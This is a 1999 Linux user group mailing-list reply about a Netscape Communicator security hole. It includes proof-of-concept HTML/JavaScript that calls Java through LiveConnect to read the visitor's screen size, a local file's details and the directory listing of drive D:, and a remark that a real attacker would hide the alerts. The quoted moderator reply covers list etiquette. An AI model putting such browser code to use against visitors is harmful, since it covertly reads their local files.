I am sending the source code that is capable of getting the root directory
structure in a javascript array and can determine the screen height and
width of the user - by calling Java codes through LiveConnect!. It does
everything in the Background, other than sending an alert ( of course a real
hacker won't be fool enough or generous enough to show any alert ! ).

<HTML>
<HEAD>
<TITLE>ACCESSING JAVA DIRECTLY</TITLE>
<SCRIPT LANGUAGE="JavaScript">
var toolkit=Packages.java.awt.Toolkit.getDefaultToolkit()
var size=toolkit.getScreenSize()
var width=size.width
var height=size.height
var dpi=toolkit.getScreenResolution()
alert("Your Screen Size is " + width + " x " + height + " at " + dpi + "
dpi.")
var out=Packages.java.io.File("D:\Table.txt")
out1=out.getPath()
out2=out.length()
out3=out.getParent()
var o=Packages.java.io.File("D:")
var m=o.list()
var t=m.length
alert(t)
alert("The file path is " + out1 + " with size " + out2 + " bytes " + " with
parent " + out3)
for (var i=0; i <= t; i++) {
var y=m[i]
alert(y)
}


</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

----- Original Message -----
From: Indranil Das Gupta <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, September 27, 1999 11:04 PM
Subject: Re: [ilug-cal] Security Hole in Netscape Communicator


> Hi Suman,
>
> Good to see you back after on the list after a long time. But a couple of
> points --
>
> 1. Please do not send mail in html format, it is a pain to handle for many
> people, as well as a waste of bandwidth and d/l time for those sitting
> on slow pipes to the net. Please be a little considerate.
>
> 2. When sending mails to the list that deal with security issues or bugs,
> please make sure that you mention the source of your information and
> include any URLs that lead to more information in that topic.
>
> > SUGGEST A SOLUTION BY REVIEWING THE SOURCE CODE OF Mozilla! AT =
> > HTTP://WWW.NETSCAPE.COM.
>
> Please don't yell! My nerves are not quite what they used to be due a lot
of
> long overdue sleep :)
>
> Cheers,
> --Indra.
>
> [Note to all members: HTML mail is sooned going to be banned on this list
> (It was never welcome in the first place). One of these days I am going to
> re-configure our majordomo config to bounce all htmlised mail.]
>
>
> --
> To unsubscribe, send mail to [EMAIL PROTECTED] with the body
> "unsubscribe ilug-cal" and an empty subject line.
> FAQ: http://www.ilug-cal.org/help/faq_list.html


--
To unsubscribe, send mail to [EMAIL PROTECTED] with the body
"unsubscribe ilug-cal" and an empty subject line.
FAQ: http://www.ilug-cal.org/help/faq_list.html

Reply via email to